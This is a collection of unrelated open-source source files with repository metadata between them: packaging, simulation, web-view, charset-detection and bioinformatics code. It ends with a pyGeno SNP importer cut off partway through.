#
#
#
#def get_controls_ratios(search_text, controls):
# name_control_map = UniqueDict()
#
# # collect all the possible names for all controls
# # and build a list of them
# for ctrl in controls:
# ctrl_names = get_control_names(ctrl)
#
# # for each of the names
# for name in ctrl_names:
# name_control_map[name] = ctrl
#
# match_ratios, best_ratio, best_text = \
# _get_match_ratios(name_control_map.keys(), search_text)
#
# return match_ratios, best_ratio, best_text,
|
lgpl-2.1
|
MinerKasch/dd-agent
|
setup.py
|
7
|
5157
|
# (C) Datadog, Inc. 2010-2016
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
# stdlib
from datetime import date
import os
import sys
# 3p
from setuptools import find_packages, setup
from requests.certs import where
# project
from config import get_version
from utils.jmx import JMX_FETCH_JAR_NAME
# Extra arguments to pass to the setup function
extra_args = {}
# Prereqs of the build. Won't get installed when deploying the egg.
setup_requires = []
# Prereqs of the install. Will install when deploying the egg.
install_requires = []
# Modified on mac
app_name = 'datadog-agent'
# plist (used only on mac)
plist = None
if sys.platform == 'win32':
from glob import glob
# noqa for flake8, these imports are probably here to force packaging of these modules
import py2exe # noqa
import pysnmp_mibs # noqa
import pyVim # noqa
import pyVmomi # noqa
# That's just a copy/paste of requirements.txt
for reqfile in ('requirements.txt', 'requirements-opt.txt'):
with open(reqfile) as f:
for line in f:
line = line.strip()
if line.startswith('#') or not line:
continue
# we skip psycopg2 now because don't want to install PG
# on windows
if 'psycopg2' in line:
continue
install_requires.append(line)
# windows-specific deps
install_requires.append('pywin32==217')
# Modules to force-include in the exe
include_modules = [
# 3p
'wmi',
'win32service',
'win32serviceutil',
'win32event',
'simplejson',
'adodbapi',
'pycurl',
'tornado.curl_httpclient',
'pymongo',
'pymysql',
'psutil',
'pg8000',
'redis',
'requests',
'pysnmp',
'pysnmp.smi.mibs.*',
'pysnmp.smi.mibs.instances.*',
'pysnmp_mibs.*',
'pysnmp.entity.rfc3413.oneliner.*',
'pyVim.*',
'pyVmomi.*',
'paramiko',
'Crypto',
'winrandom',
'uptime',
'pythoncom',
'dns.resolver',
'dns.rdtypes.ANY.*',
'dns.rdtypes.IN.*',
# agent
'checks.network_checks',
'checks.wmi_check',
'checks.libs.vmware.*',
'httplib2',
'utils.containers',
'scandir',
# pup
'tornado.websocket',
'tornado.web',
'tornado.ioloop',
]
class Target(object):
def __init__(self, **kw):
self.__dict__.update(kw)
self.version = get_version()
self.company_name = 'Datadog, Inc.'
self.copyright = 'Copyright 2013 Datadog, Inc.'
self.cmdline_style = 'pywin32'
agent_svc = Target(name='Datadog Agent', modules='win32.agent', dest_base='ddagent')
extra_args = {
'options': {
'py2exe': {
'includes': ','.join(include_modules),
'optimize': 0,
'compressed': True,
'bundle_files': 3,
'excludes': ['numpy'],
'dll_excludes': ['crypt32.dll',"IPHLPAPI.DLL", "NSI.dll", "WINNSI.DLL", "WTSAPI32.dll"],
'ascii':False,
},
},
'console': ['win32\shell.py'],
'service': [agent_svc],
'windows': [{'script': 'win32\gui.py',
'dest_base': "agent-manager",
'uac_info': "requireAdministrator", # The manager needs to be administrator to stop/start the service
'icon_resources': [(1, r"packaging\datadog-agent\win32\install_files\dd_agent_win_256.ico")],
}],
'data_files': [
("Microsoft.VC90.CRT", glob(r'C:\Python27\redist\*.*')),
('jmxfetch', [r'checks\libs\%s' % JMX_FETCH_JAR_NAME]),
('gohai', [r'gohai\gohai.exe']),
('', [where()]), # CA certificates bundled with `requests`
],
}
elif sys.platform == 'darwin':
app_name = 'Datadog Agent'
from plistlib import Plist
plist = Plist.fromFile(os.path.dirname(os.path.realpath(__file__)) + '/packaging/Info.plist')
plist.update(dict(
CFBundleGetInfoString="{0}, Copyright (c) 2009-{1}, Datadog Inc.".format(
get_version(), date.today().year),
CFBundleVersion=get_version()
))
extra_args = {
'app': ['gui.py'],
'data_files': [
'images',
'status.html',
],
'options': {
'py2app': {
'optimize': 0,
'iconfile': 'packaging/Agent.icns',
'plist': plist
}
}
}
setup(
name=app_name,
version=get_version(),
description="DevOps' best friend",
author='DataDog',
author_email='[email protected]',
url='http://www.datadoghq.com',
install_requires=install_requires,
setup_requires=setup_requires,
packages=find_packages(),
include_package_data=True,
test_suite='nose.collector',
zip_safe=False,
**extra_args
)
|
bsd-3-clause
|
hbhzwj/imalse
|
tools/ns-allinone-3.14.1/ns-3.14.1/src/spectrum/bindings/callbacks_list.py
|
63
|
1224
|
callback_classes = [
['void', 'ns3::Ptr<ns3::Packet>', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
['void', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
['void', 'ns3::Ptr<ns3::Packet const>', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
['bool', 'ns3::Ptr<ns3::Packet>', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
['bool', 'ns3::Ptr<ns3::NetDevice>', 'ns3::Ptr<ns3::Packet const>', 'unsigned short', 'ns3::Address const&', 'ns3::Address const&', 'ns3::NetDevice::PacketType', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
['bool', 'ns3::Ptr<ns3::NetDevice>', 'ns3::Ptr<ns3::Packet const>', 'unsigned short', 'ns3::Address const&', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
['void', 'ns3::Ptr<ns3::NetDevice>', 'ns3::Ptr<ns3::Packet const>', 'unsigned short', 'ns3::Address const&', 'ns3::Address const&', 'ns3::NetDevice::PacketType', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
]
|
gpl-3.0
|
frainfreeze/studying
|
home/python/venv/lib/python3.5/site-packages/pip/_vendor/chardet/charsetgroupprober.py
|
270
|
3787
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .enums import ProbingState
from .charsetprober import CharSetProber
class CharSetGroupProber(CharSetProber):
def __init__(self, lang_filter=None):
super(CharSetGroupProber, self).__init__(lang_filter=lang_filter)
self._active_num = 0
self.probers = []
self._best_guess_prober = None
def reset(self):
super(CharSetGroupProber, self).reset()
self._active_num = 0
for prober in self.probers:
if prober:
prober.reset()
prober.active = True
self._active_num += 1
self._best_guess_prober = None
@property
def charset_name(self):
if not self._best_guess_prober:
self.get_confidence()
if not self._best_guess_prober:
return None
return self._best_guess_prober.charset_name
@property
def language(self):
if not self._best_guess_prober:
self.get_confidence()
if not self._best_guess_prober:
return None
return self._best_guess_prober.language
def feed(self, byte_str):
for prober in self.probers:
if not prober:
continue
if not prober.active:
continue
state = prober.feed(byte_str)
if not state:
continue
if state == ProbingState.FOUND_IT:
self._best_guess_prober = prober
return self.state
elif state == ProbingState.NOT_ME:
prober.active = False
self._active_num -= 1
if self._active_num <= 0:
self._state = ProbingState.NOT_ME
return self.state
return self.state
def get_confidence(self):
state = self.state
if state == ProbingState.FOUND_IT:
return 0.99
elif state == ProbingState.NOT_ME:
return 0.01
best_conf = 0.0
self._best_guess_prober = None
for prober in self.probers:
if not prober:
continue
if not prober.active:
self.logger.debug('%s not active', prober.charset_name)
continue
conf = prober.get_confidence()
self.logger.debug('%s %s confidence = %s', prober.charset_name, prober.language, conf)
if best_conf < conf:
best_conf = conf
self._best_guess_prober = prober
if not self._best_guess_prober:
return 0.0
return best_conf
|
mit
|
Evervolv/android_external_chromium_org
|
tools/diagnose-me.py
|
50
|
3016
|
#!/usr/bin/python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Diagnose some common system configuration problems on Linux, and
suggest fixes."""
import os
import subprocess
import sys
all_checks = []
def Check(name):
"""Decorator that defines a diagnostic check."""
def wrap(func):
all_checks.append((name, func))
return func
return wrap
@Check("/usr/bin/ld is not gold")
def CheckSystemLd():
proc = subprocess.Popen(['/usr/bin/ld', '-v'], stdout=subprocess.PIPE)
stdout = proc.communicate()[0]
if 'GNU gold' in stdout:
return ("When /usr/bin/ld is gold, system updates can silently\n"
"corrupt your graphics drivers.\n"
"Try 'sudo apt-get remove binutils-gold'.\n")
return None
@Check("random lds are not in the $PATH")
def CheckPathLd():
proc = subprocess.Popen(['which', '-a', 'ld'], stdout=subprocess.PIPE)
stdout = proc.communicate()[0]
instances = stdout.split()
if len(instances) > 1:
return ("You have multiple 'ld' binaries in your $PATH:\n"
+ '\n'.join(' - ' + i for i in instances) + "\n"
"You should delete all of them but your system one.\n"
"gold is hooked into your build via gyp.\n")
return None
@Check("/usr/bin/ld doesn't point to gold")
def CheckLocalGold():
# Check /usr/bin/ld* symlinks.
for path in ('ld.bfd', 'ld'):
path = '/usr/bin/' + path
try:
target = os.readlink(path)
except OSError, e:
if e.errno == 2:
continue # No such file
if e.errno == 22:
continue # Not a symlink
raise
if '/usr/local/gold' in target:
return ("%s is a symlink into /usr/local/gold.\n"
"It's difficult to make a recommendation, because you\n"
"probably set this up yourself. But you should make\n"
"/usr/bin/ld be the standard linker, which you likely\n"
"renamed /usr/bin/ld.bfd or something like that.\n" % path)
return None
@Check("random ninja binaries are not in the $PATH")
def CheckPathNinja():
proc = subprocess.Popen(['which', 'ninja'], stdout=subprocess.PIPE)
stdout = proc.communicate()[0]
if not 'depot_tools' in stdout:
return ("The ninja binary in your path isn't from depot_tools:\n"
+ " " + stdout +
"Remove custom ninjas from your path so that the one\n"
"in depot_tools is used.\n")
return None
def RunChecks():
for name, check in all_checks:
sys.stdout.write("* Checking %s: " % name)
sys.stdout.flush()
error = check()
if not error:
print "ok"
else:
print "FAIL"
print error
if __name__ == '__main__':
RunChecks()
|
bsd-3-clause
|
groovecoder/kuma
|
kuma/users/providers/persona/views.py
|
21
|
3499
|
import requests
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.http import HttpResponse, QueryDict
from django.shortcuts import redirect
from django.template import RequestContext
from django.views.decorators.http import require_POST, require_GET
from allauth.socialaccount.helpers import complete_social_login
from allauth.socialaccount.helpers import render_authentication_error
from allauth.socialaccount.models import SocialLogin
from allauth.socialaccount import app_settings, providers
from kuma.core.urlresolvers import reverse
from kuma.core.decorators import never_cache
from .provider import PersonaProvider
@never_cache
@require_GET
def persona_csrf(request):
"""Fetch a CSRF token for the frontend JavaScript."""
# Bluntly stolen from django-browserid
# Different CSRF libraries (namely session_csrf) store the CSRF
# token in different places. The only way to retrieve the token
# that works with both the built-in CSRF and session_csrf is to
# pull it from the template context processors via
# RequestContext.
context = RequestContext(request)
# csrf_token might be a lazy value that triggers side-effects,
# so we need to force it to a string.
csrf_token = unicode(context.get('csrf_token', ''))
return HttpResponse(csrf_token)
@require_POST
def persona_login(request):
"""
This is a view to work around an optimization in the Zeus load balancer
that doesn't allow creating session cookies on the frontpage.
We're stash the Persona assertion in the session and trigger setting
the session cookie by that. We then redirect to the real persona login
view called "persona_complete" to complete the Perona steps.
"""
# REDFLAG FIXME TODO GODDAMNIT
request.session['sociallogin_assertion'] = request.POST.get('assertion', '')
querystring = QueryDict('', mutable=True)
for param in ('next', 'process'):
querystring[param] = request.POST.get(param, '')
return redirect('%s?%s' % (reverse('persona_complete'),
querystring.urlencode('/')))
def persona_complete(request):
assertion = request.session.pop('sociallogin_assertion', '')
provider_settings = app_settings.PROVIDERS.get(PersonaProvider.id, {})
audience = provider_settings.get('AUDIENCE', None)
if audience is None:
raise ImproperlyConfigured("No Persona audience configured. Please "
"add an AUDIENCE item to the "
"SOCIALACCOUNT_PROVIDERS['persona'] setting.")
resp = requests.post(settings.PERSONA_VERIFIER_URL,
{'assertion': assertion,
'audience': audience})
try:
resp.raise_for_status()
extra_data = resp.json()
if extra_data['status'] != 'okay':
return render_authentication_error(
request,
provider_id=PersonaProvider.id,
extra_context={'response': extra_data})
except (ValueError, requests.RequestException) as e:
return render_authentication_error(
request,
provider_id=PersonaProvider.id,
exception=e)
login = providers.registry \
.by_id(PersonaProvider.id) \
.sociallogin_from_response(request, extra_data)
login.state = SocialLogin.state_from_request(request)
return complete_social_login(request, login)
|
mpl-2.0
|
ewheeler/rapidsms-core
|
lib/rapidsms/webui/utils.py
|
2
|
9801
|
#!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
import sys
import copy
import os, re, traceback
from rapidsms.webui import settings
from django.template import RequestContext
from django.shortcuts import render_to_response as django_r_to_r
from django.core.paginator import Paginator, EmptyPage, InvalidPage
def render_to_response(req, template_name, dictionary=None, **kwargs):
"""Proxies calls to django.shortcuts.render_to_response, to avoid having
to include the global variables in every request. This is a giant hack,
and there's probably a much better solution."""
rs_dict = {
"apps": settings.RAPIDSMS_APPS.values(),
"debug": settings.DEBUG,
"javascripts": []
}
def __js_dir(fs_path, web_prefix):
"""Adds all of the .js files in a given directory to the javascripts array,
to be included in the <head>. Also checks for a single file js with the
same name as the directory. (dir_name/*.js and dir_name.js)"""
if os.path.exists(fs_path):
rs_dict["javascripts"].extend([
"%s/%s" % (web_prefix, fn)
for fn in os.listdir(fs_path)
if fn[-3:] == ".js"])
if os.path.exists("%s.js" % (fs_path)):
rs_dict["javascripts"].append(
"%s.js" % (web_prefix))
# add all of the global javascript files for all running
# apps. this is super handy for packaging functionality
# which affects the whole webui without hard-coding it
for app in rs_dict["apps"]:
__js_dir(
"%s/static/javascripts/global" % app["path"],
"/static/%s/javascripts/global" % app["type"])
# A NEW KIND OF LUNACY: inspect the stack to find out
# which rapidsms app this function is being called from
# --
# TODO: we're assuming that this function was called
# directly from the view, and looking for it at -2 in
# the stack. this could be wrong, if something else is
# further abstracting the call (which sounds fun).
tb = traceback.extract_stack(limit=2)
sep = os.sep
if sep == '\\':
# if windows, the file separator itself needs to be
# escaped again
sep = "\\\\"
m = re.match(r'^.+%s(.+?)%sviews\.py$' % (sep, sep), tb[-2][0])
if m is not None:
app_type = m.group(1)
# since we're fetching the app conf, add it to the
# template dict. it wouldn't be a very good idea to
# use it, but sometimes, when time is short...
rs_dict["app_conf"] = settings.RAPIDSMS_APPS[app_type]
# note which app this func was called from, so the tmpl
# can mark the tab (or some other type of nav) as active
rs_dict["active_app"] = rs_dict["app_conf"]["type"]
# also note which "view" (function) this func was called
# from, for a little introspection later in the rendering
# process (the view name is added to the css class
# of <body> to make per-view styling free)
rs_dict["active_view"] = tb[-2][2]
# find all of the javascript assets for
# this app, and add them to the <head>
__js_dir(
"%s/static/javascripts/app" % rs_dict["app_conf"]["path"],
"/static/%s/javascripts/app" % rs_dict["app_conf"]["type"])
# check for a view-specific javascript,
# to add LAST, after the dependencies
__js_dir(
"%s/static/javascripts/page/%s" % (rs_dict["app_conf"]["path"], rs_dict["active_view"]),
"/static/%s/javascripts/page/%s.js" % (rs_dict["app_conf"]["type"], rs_dict["active_view"]))
# attempt to import the "__global" function from
# the views.py that this method was called from
try:
mod_str = "%s.views" % rs_dict["app_conf"]["module"]
module = __import__(mod_str, {}, {}, ["__global"])
except ImportError:
pass
# if the views have a __global function, call it with the
# request object, and add the output (a dictionary) to the
# rs_dict. note that the 'dictionary' argument to _this_
# method is merged AFTER this, overriding the global data.
# also note that we do this here, rather than in the try
# block above, to avoid masking exceptions raised within
if module and hasattr(module, "__global"):
global_data = module.__global(req)
rs_dict.update(global_data)
# allow the dict argument to
# be omitted without blowing up
if dictionary is not None:
rs_dict.update(dictionary)
# unless a context instance has been provided,
# default to RequestContext, to get all of
# the TEMPLATE_CONTEXT_PROCESSORS working
if "context_instance" not in kwargs:
kwargs["context_instance"] = RequestContext(req)
# add the template information to the dictionary,
# if necessary
if not "base_template" in rs_dict:
rs_dict["base_template"] = settings.BASE_TEMPLATE
# Let apps know whether i18n is on or off
if hasattr(settings,"RAPIDSMS_I18N"):
kwargs["context_instance"]["USE_I18N"] = True
# pass on the combined dicts to the original function
return django_r_to_r(template_name, rs_dict, **kwargs)
def paginated(req, query_set, per_page=20, prefix="", wrapper=None):
# since the behavior of this function depends on
# the GET parameters, if there is more than one
# paginated set per view, we'll need to prefix
# the parameters to differentiate them
prefix = ("%s-" % (prefix)) if prefix else ""
# the per_page argument to this function provides
# a default, but can be overridden per-request. no
# interface for this yet, so it's... an easter egg?
if (prefix + "per-page") in req.GET:
try:
per_page = int(req.GET[prefix+"per-page"])
# if it was provided, it must be valid. we don't
# want links containing extra useless junk like
# invalid GET parameters floating around
except ValueError:
raise ValueError("Invalid per-page parameter: %r" %
(req.GET[prefix + "per-page"]))
try:
page = int(req.GET.get(prefix+"page", "1"))
paginator = Paginator(query_set, per_page)
objects = paginator.page(page)
objects.page_count = paginator.num_pages
# have no mercy if the page parameter is not valid. there
# should be no links to an invalid page, so coercing it to
# assume "page=xyz" means "page=1" would just mask bugs
except (ValueError, EmptyPage, InvalidPage):
raise ValueError("Invalid Page: %r" %
(req.GET[prefix + "page"]))
# if a wrapper function was provided, call it for each
# object on the page, and replace the list with the result
if wrapper is not None:
objects.raw_object_list = objects.object_list
objects.object_list = map(wrapper, objects.object_list)
# attach the prefix (if provided; might be blank) to the
# objects, where it can be found by the {% paginator %} tag
objects.prefix = prefix
return objects
def self_link(req, **kwargs):
new_kwargs = req.GET.copy()
# build a new querydict using the GET params from the
# current request, with those passed to this function
# overridden. we can't use QueryDict.update here, since
# it APPENDS, rather than REPLACING keys. i hate CGI :|
for k, v in kwargs.items():
new_kwargs[k] = v
# return the same path that we're currently
# viewing, with the updated query string
kwargs_enc = new_kwargs.urlencode()
return "%s?%s" % (req.path, kwargs_enc)
def dashboard(position, path, perm=None):
def fake_templatetag(f):
''' Adds a fake (rendered -- not curried) templatetag to dashboard's
templatetags and returns the original function unchanged so it
can be registered normally as a proper templatetag in its home app. '''
from django import template
register = template.get_library("webapp.templatetags.webapp-tags")
# add the rendered template to dashboard templatetags library
name = position
if perm is not None:
# add permission to the name so we'll have
# 'position_name-app.perm_name'
name = name + '-' + perm
try:
# add the rendered template to dashboard's library of tags
register.tags.update({ name : massaman(f, path) })
except Exception,e:
# if something goes wrong, pass the error along to the dashboard
register.tags.update({ name : "Error loading %s. %s" % (f.func_name, e) })
return f
def massaman(function, file_name):
''' Returns a rendered template from the output of a function and
a template file (for making fake templatetags).
Code is poached from the InclusionNode class in __init__.py
of django.template '''
from django.template.loader import get_template, select_template
from django.template.context import Context
if not isinstance(file_name, basestring) and is_iterable(file_name):
t = select_template(file_name)
else:
t = get_template(file_name)
nodelist = t.nodelist
# make a context object from the output of the function
# and return the rendered template with this context -- which is
# the resulting dict returned by the function
# TODO autoescape context
return nodelist.render(Context(function()))
return fake_templatetag
|
lgpl-3.0
|
sudosurootdev/kernel_staging
|
tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/Util.py
|
12527
|
1935
|
# Util.py - Python extension for perf script, miscellaneous utility code
#
# Copyright (C) 2010 by Tom Zanussi <[email protected]>
#
# This software may be distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
import errno, os
FUTEX_WAIT = 0
FUTEX_WAKE = 1
FUTEX_PRIVATE_FLAG = 128
FUTEX_CLOCK_REALTIME = 256
FUTEX_CMD_MASK = ~(FUTEX_PRIVATE_FLAG | FUTEX_CLOCK_REALTIME)
NSECS_PER_SEC = 1000000000
def avg(total, n):
return total / n
def nsecs(secs, nsecs):
return secs * NSECS_PER_SEC + nsecs
def nsecs_secs(nsecs):
return nsecs / NSECS_PER_SEC
def nsecs_nsecs(nsecs):
return nsecs % NSECS_PER_SEC
def nsecs_str(nsecs):
str = "%5u.%09u" % (nsecs_secs(nsecs), nsecs_nsecs(nsecs)),
return str
def add_stats(dict, key, value):
if not dict.has_key(key):
dict[key] = (value, value, value, 1)
else:
min, max, avg, count = dict[key]
if value < min:
min = value
if value > max:
max = value
avg = (avg + value) / 2
dict[key] = (min, max, avg, count + 1)
def clear_term():
print("\x1b[H\x1b[2J")
audit_package_warned = False
try:
import audit
machine_to_id = {
'x86_64': audit.MACH_86_64,
'alpha' : audit.MACH_ALPHA,
'ia64' : audit.MACH_IA64,
'ppc' : audit.MACH_PPC,
'ppc64' : audit.MACH_PPC64,
's390' : audit.MACH_S390,
's390x' : audit.MACH_S390X,
'i386' : audit.MACH_X86,
'i586' : audit.MACH_X86,
'i686' : audit.MACH_X86,
}
try:
machine_to_id['armeb'] = audit.MACH_ARMEB
except:
pass
machine_id = machine_to_id[os.uname()[4]]
except:
if not audit_package_warned:
audit_package_warned = True
print "Install the audit-libs-python package to get syscall names"
def syscall_name(id):
try:
return audit.audit_syscall_to_name(id, machine_id)
except:
return str(id)
def strerror(nr):
try:
return errno.errorcode[abs(nr)]
except:
return "Unknown %d errno" % nr
|
gpl-2.0
|
irwinsnet/DesPy
|
despy/fel/event.py
|
1
|
9768
|
# Despy: A discrete event simulation framework for Python
# Version 0.1
# Released under the MIT License (MIT)
# Copyright (c) 2015, Stacy Irwin
"""
****************
despy.model.event
****************
.. autosummary::
Event
.. todo
Refactor event so it no longer inherits from Component.
Add remove_trace_field method.
Consider getting rid of trace_record history.
Use custom event CB object that receives event class as argument.
"""
import types
from collections import OrderedDict
from despy.model.component import Component
from despy.output.trace import TraceRecord
EARLY = -1
STANDARD = 0
LATE = 1
class Priority():
"""Define priorities for ordering events scheduled at the same time.
**Priority Levels**
The Priority class defines three constants that are used to
prioritize events that are scheduled to occur at the same time.
Events assigned a higher priority will occur before events that
are assigned lower priorities.
*Priority.STANDARD*
Despy uses Priority.STANDARD as the default priority when no
other priority is specified.
*Priority.EARLY*
Events assigned Priority.EARLY will be executed before
Priority.STANDARD and Priority.LATE events.
*Priority.LATE*
Events assigned Priority.LATE will be executed after
Priority.EARLY and Priority.STANDARD events.
Events scheduled to occur at the same time with the same
priority may be executed in any order.
The priority integer value is added to the scheduled event time.
Internally, Despy multiplies the scheduled time by 10. This
means that events scheduled to occur at time 1 are internally
scheduled for time 10, time 12 events would occur at internal
time 120, etc. This scheduling mechanism allows priorities as
high as 4 and as low as -4. A model that requires more than
three different priorities probably needs to be redesigned,
therefore, Despy only provides named constants for priorities
from -1 to 1.
"""
EARLY = -1
STANDARD = 0
LATE = 1
class Event(Component):
""" A base class for all events.
Create an event by inheriting from the Event class. Subclasses of
Event must instantiate one or more of the doPriorEvent(),
do_event(), or doPostEvent() methods. The Simulation will execute
these methods when the Event time occurs and the Event object is
removed from the FEL.
**Inherited Classes**
* :class:`despy.model.component.Component`
**Members**
.. autosummary::
trace_fields
trace_records
append_callback
add_trace_field
do_event
dp_update_trace_record
_reset
__lt__
__gt__
"""
def __init__(self, name, trace_fields = None):
"""Initialize the Event object.
*Arguments*
``model`` (:class:`despy.model.model.Model`):
The Model that the event belongs to.
``name`` (string):
A short string describing the event. The name will be
printed in the event trace report.
``trace_fields`` (collections.OrderedDict)
An ordered dictionary of fields that will be added to the
trace record for this event.
"""
super().__init__(name)
self.description = "Event"
self._callbacks = []
self._trace_fields = OrderedDict()
if trace_fields is not None:
for key, value in trace_fields.items():
self.trace_fields[key] = value
self._trace_records = []
@property
def trace_fields(self):
"""An ordered dictionary containing custom trace data.
*Returns:* An instance of ``OrderedDict`` with custom trace data
stored as key: value pairs.
"""
return self._trace_fields
@property
def trace_records(self):
"""A list of trace records for completed events.
A single event object can be reused by rescheduling it on the
FEL. The ``trace_records`` attribute is a list of all
trace records that have been completed for the ``Event`` object.
*Returns:* A list of :class:`despy.output.trace.TraceRecord`
objects.
"""
return self._trace_records
def append_callback(self, callback):
"""Appends a function to the event's callback list.
The function will be called when the event is removed from the
FEL and executed.
*Arguments*
callback (function):
A variable that represents a class method or function.
"""
if isinstance(callback, types.FunctionType) or isinstance(callback,
types.MethodType):
self._callbacks.append(callback)
else:
raise TypeError("Object passed to Event.append_callback() was a "
"{} object. Nust be a function or method "
"object.".format(callback.__class__))
def add_trace_field(self, key, value):
"""Add custom fields to the event's trace record.
This method is typically called from an event's callback method.
It adds ``value`` to the event's trace record, labeled with the
text in ``key``.
*Arguments*
``key`` (String)
A text label that describes the data in ``value``.
``value`` (String or Number)
A number, string, or other text-convertible value.
"""
self.trace_fields[key] = value
def add_message(self, message, fields):
msg_record = TraceRecord(self.sim.rep, self.sim.now,
self.sim.pri, "Msg", message)
if fields is not None:
msg_record.add_fields(fields)
self.trace_records.append(msg_record)
def dp_do_event(self):
"""Executes an event's callback functions.
Internal Method. The ``_do_event`` called by the ``Simulation``
class's ``step()`` method. It is not intended to be called by the
user.
*Returns:* ``True`` if a callback method is executed. ``None`` if
there are no callbacks attached to the event.
"""
# Event record will precede any messages created in do_event().
evt_record = TraceRecord(self.sim.rep, self.sim.now,
self.sim.pri, "Event", self.name)
self.trace_records.append(evt_record)
self.do_event()
for callback in self._callbacks:
if isinstance(callback, types.FunctionType):
callback(self)
if isinstance(callback, types.MethodType):
callback()
# Modify record with info generated during event.
self.trace_records[0] = self.dp_update_trace_record(evt_record)
self.sim.results.trace.add(self.trace_records)
# Clean up in case event is re-used.
self.trace_records.clear()
def do_event(self):
pass
def dp_update_trace_record(self, trace_record):
"""Updates a trace record with custom fields.
Internal Method. The ``dp_update_trace_record`` method is called
by the ``trace`` object. It is not intended to be called by the
user.
*Arguments*
``trace_record``
A :class:`despy.output.trace.TraceRecord` object. The
TraceRecord will be added to the simulation's trace
report to record the occurrence of the event.
*Returns:* A Python list containing the updated trace record.
"""
trace_record = self.update_trace_record(trace_record)
if self.trace_fields is not None:
for key, value in self.trace_fields.items():
trace_record[key] = value
return trace_record
def update_trace_record(self, trace_record):
return trace_record
def __lt__(self, y):
"""Defines how ``Event`` objects respond to less-than operator.
The Python magic methods ``__lt__`` and ``__gt__`` are necessary
because the FEL is implemented as a heap. All items on a heap
must be sortable. Events are primarily sorted by simulation time.
For events that are scheduled to occur at the same time, this
method provides a secondary sort order based on the ``Event``
object's ``id`` attribute.
*Arguments*
``y``
The other ``Event`` object that is being compared with
the less-than operator.
*Returns:* ``True`` if ``self.id < y.id``, ``False`` otherwise.
"""
return self.id < y.id
def __gt__(self, y):
"""Defines how ``Event`` objects respond to '>' operator.
See documentation for ``__lt__`` for an explanation of why this
Python magic method is necessary.
*Arguments*
``y``
The other ``Event`` object that is being compared with
the greater-than operator.
*Returns:* ``True`` if ``self.id > y.id``, ``False`` otherwise.
"""
return self.id > y.id
|
mit
|
ollitapa/VTT-Raytracer
|
python_source/pyraytracer/spectrumTools.py
|
1
|
1572
|
#
# Copyright 2015 VTT Technical Research Center of Finland
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
from scipy.stats import norm
def generateLEDspectrum(domWave, fwhm, wavelengths, power=1.0, cut=True):
'''
Genarate gaussian shape LED spectrum.
if cut=True, all 0 intensities are cut out.
'''
variance = fwhm / (2 * np.sqrt(2 * np.log(2)))
rv = norm(loc=domWave, scale=variance)
intens = rv.pdf(wavelengths) * power
intens[intens < 1e-3] = 0
if cut:
truth = intens != 0
wavelengths = wavelengths[truth]
intens = intens[truth]
return(wavelengths, intens)
def generateAttennuationSpectrum(transmissivity, thickness):
'''
Function that generated attenuation coefficients of Beer-Lambert medium.
transmissivity : array (or single number) of transmissivity [0,1] at
different wavelengths.
thickness : thickness of the sample that the transmission was measured.
'''
att = -np.log(transmissivity) / thickness
return(att)
|
apache-2.0
|
logan169/pyGeno
|
pyGeno/importation/SNPs.py
|
1
|
7001
|
import urllib, shutil
from ConfigParser import SafeConfigParser
import pyGeno.configuration as conf
from pyGeno.SNP import *
from pyGeno.tools.ProgressBar import ProgressBar
from pyGeno.tools.io import printf
from Genomes import _decompressPackage, _getFile
from pyGeno.tools.parsers.CasavaTools import SNPsTxtFile
from pyGeno.tools.parsers.VCFTools import VCFFile
from pyGeno.tools.parsers.CSVTools import CSVFile
def importSNPs(packageFile) :
"""The big wrapper, this function should detect the SNP type by the package manifest and then launch the corresponding function.
Here's an example of a SNP manifest file for Casava SNPs::
[package_infos]
description = Casava SNPs for testing purposes
maintainer = Tariq Daouda
maintainer_contact = tariq.daouda [at] umontreal
version = 1
[set_infos]
species = human
name = dummySRY
type = Agnostic
source = my place at IRIC
[snps]
filename = snps.txt # as with genomes you can either include de file at the root of the package or specify an URL from where it must be downloaded
"""
printf("Importing polymorphism set: %s... (This may take a while)" % packageFile)
packageDir = _decompressPackage(packageFile)
parser = SafeConfigParser()
parser.read(os.path.normpath(packageDir+'/manifest.ini'))
packageInfos = parser.items('package_infos')
setName = parser.get('set_infos', 'name')
typ = parser.get('set_infos', 'type')+'SNP'
